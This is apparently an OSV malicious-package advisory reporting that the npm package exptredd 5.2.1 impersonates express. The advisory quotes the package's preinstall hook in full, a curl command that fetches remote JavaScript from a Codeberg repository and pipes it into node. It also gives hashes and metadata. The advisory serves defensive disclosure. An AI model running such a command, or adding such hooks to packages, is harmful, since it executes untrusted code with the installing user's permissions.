{"id":"MAL-2026-17247","summary":"Malicious code in exptredd (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (288357063a28e85e649fc37c747c724bd06ce09c16624f7b2cad3dc854296035)\nnpm package exptredd@5.2.1 impersonates the express package: package.json copies express's description, author, repository, contributors, and dependency list verbatim while shipping under the name 'exptredd'. package.json line 98 declares a preinstall lifecycle hook that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching a JavaScript file from a third-party Codeberg repository on a mutable branch (via web.archive.org) with no version pin, hash, or signature, and piping it directly into node. Any developer who mistypes `express` and runs `npm install exptredd` executes arbitrary code from an account unrelated to the expressjs publisher at install time, with full permissions of the installing user.\n","modified":"2026-09-29T15:00:05.469971785Z","published":"2026-09-29T14:39:30Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["5.2.1"],"id":"IN-MAL-2026-020627","import_time":"2026-09-29T14:44:37.188150905Z","modified_time":"2026-09-29T14:39:30Z","sha256":"288357063a28e85e649fc37c747c724bd06ce09c16624f7b2cad3dc854296035"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/exptredd/v/5.2.1"}],"affected":[{"package":{"name":"exptredd","ecosystem":"npm","purl":"pkg:npm/exptredd"},"versions":["5.2.1"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"filename":"exptredd-5.2.1.tgz","hashes":{"sha1":"91a068cf6ac31c9dad83f1d8eff99209cdb46d45","sha512_sri":"sha512-u0YAjjAUpQ1AHLttM6SmGALvGUIoNNJLHLH+8eDSCgXlkQfCEohshSEJgNNaJJVHgxEwPx4KY9IQzEZk0dgwSw=="}}],"evidence_files":[{"tlsh":"f051da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e52f71b9fbf","path":"package.json","sha256":"092df5127a1acf706c0fd62b13b522d40cc65b2d5c05ca170aa885fcf99d9e2d"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exptredd/MAL-2026-17247.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}